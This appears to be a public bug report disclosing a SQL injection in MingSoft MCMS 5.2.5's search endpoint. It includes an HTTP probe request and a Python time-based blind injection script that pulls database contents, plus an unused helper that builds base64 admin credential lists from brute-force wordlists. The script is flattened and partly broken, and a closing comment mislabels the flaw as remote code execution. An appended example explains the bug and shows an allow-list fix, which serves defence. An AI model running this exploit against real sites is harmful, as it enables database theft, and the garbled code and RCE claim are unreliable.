MCMS5.2.5 net/mingsoft/cms/action/web/MCmsAction.java SQLI
aw220 opened this issue · 1 comment
As you can see, the injection was successful; the next step is to save the POST request packet and feed it to sqlmap to run.
Look up the field and find the incoming parameter.
Since the parameter names are concatenated directly into the string without any filtering, there may be a vulnerability here, so let's follow the data flow to the next link in the chain.
This block was found to have database calls
Next we try to inject. See the file net/mingsoft/cms/action/web/MCmsAction.java: from the annotation at the top of the class definition you can tell the route is host:port/mcms, and appending the method to be called gives the route host:port/mcms/search.do. Now try to inject:
```http
GET /mcms/search.do?1'=0000 HTTP/1.1
User-Agent: PostmanRuntime/7.29.0
Accept: */*
Postman-Token: 315bc447-c977-4eb8-8b99-ae231e7a2b08
Host: localhost:8080
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=96B0978724C81C34A99F09541FA893D4
```
Next I wrote a Python script for convenient verification, using time-based (delayed) injection:
"""
{0}:要查的东西
{1}:起始位置
{2}:长度
{3}:猜测的值
"""
host = "http://localhost:8080/mcms/search.do?'%2b(select+'123'+AND+if(ascii(substr({0},{1},{2}))%3d{3},sleep(2),2)),--+=000"
def a():
with open("/Users/helu/penetration/bruteDicts/account/top500_username.txt", "r") as usernames:
with open("/Users/helu/penetration/bruteDicts/account/pwdFast.txt", "r") as pwds:
with open("/Users/helu/penetration/bruteDicts/account/admin_pwd.txt", "a+") as file:
data1 = usernames.read().splitlines()
data2 = pwds.read().splitlines()
for username in data1:
for pwd in data2:
str = base64.encodebytes(("admin" + ":" + pwd).encode("utf-8"))
# str += "\n"
file.write(str.decode("utf-8"))
def timeout(url):
try:
rsp = requests.get(url, timeout=3)
return rsp.text
except Exception:
return "timeout"
def guess_length(target):
for i in range(1, 100):
url = host.format(target,1,1,i)
rsp = timeout(url)
if "timeout" in rsp:
print("库长:" + chr(i) )
return int(chr(i))
def guess_char(tar,len):
for i in range(0,len+1):
for j in range(47, 123):
url = host.format(tar,i,1,"'{0}'".format(j))
rsp = timeout(url)
if "timeout" in rsp:
print(chr(j))
def b(tar):
length = guess_length(tar)
guess_char("database()",length)
b("length(database())")
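The bug class the issue points at, as an added example that is not part of the issue or the MingSoft code base: the request parameter name itself is spliced into the WHERE clause as a column name and only the value is bound, so parameter binding does nothing for it, and the `1'=0000` probe above turns into a SQL syntax error while a crafted name turns into a tautology. The hardened version refuses any name that is not a known column before it reaches the query. SQLite with a constructed `article` table stands in for the real MySQL schema; the column names are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the CMS content table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER, title TEXT, keyword TEXT)")
    conn.executemany(
        "INSERT INTO article VALUES (?, ?, ?)",
        [(1, "hello", "cms"), (2, "world", "news")],
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, params: dict) -> tuple:
    """The pattern the issue describes: each request parameter NAME is concatenated
    straight into the SQL as a column name; only the VALUE goes through a
    placeholder, so binding cannot protect the identifier position."""
    clauses, values = [], []
    for name, value in params.items():
        clauses.append(name + " = ?")
        values.append(value)
    sql = "SELECT id, title FROM article WHERE " + " AND ".join(clauses) + " ORDER BY id"
    return sql, conn.execute(sql, values).fetchall()


# Identifiers cannot be parameterised, so the fix is an allow-list of real columns.
ALLOWED_COLUMNS = frozenset({"id", "title", "keyword"})


def search_hardened(conn: sqlite3.Connection, params: dict) -> tuple:
    """Same query, but an unknown parameter name is rejected before it touches the SQL."""
    clauses, values = [], []
    for name, value in params.items():
        if name not in ALLOWED_COLUMNS:
            raise ValueError(f"unknown search field: {name!r}")
        clauses.append(f'"{name}" = ?')
        values.append(value)
    sql = "SELECT id, title FROM article WHERE " + " AND ".join(clauses) + " ORDER BY id"
    return sql, conn.execute(sql, values).fetchall()


def probe(search, conn: sqlite3.Connection, params: dict) -> str:
    """Classify the outcome the way a tester reads it: a row count, a SQL error
    (what the issue's 1'=0000 probe triggers), or a rejected parameter."""
    try:
        _, rows = search(conn, params)
        return f"{len(rows)} rows"
    except sqlite3.OperationalError:
        return "sql error"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    conn = make_db()
    # Legitimate search, the issue's error probe, and a tautology smuggled in via the parameter name.
    for params in ({"keyword": "cms"}, {"1'": "0000"}, {"1=1 OR id": "0000"}):
        print(params,
              "| vulnerable:", probe(search_vulnerable, conn, params),
              "| hardened:", probe(search_hardened, conn, params))
```

The allow-list is the only workable control here: quoting or escaping the value does not help because the attacker-controlled text is in the identifier position, which no driver's placeholder mechanism covers.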
Wow, a remote code execution vulnerability. Almost two months have gone by and not a single person has replied.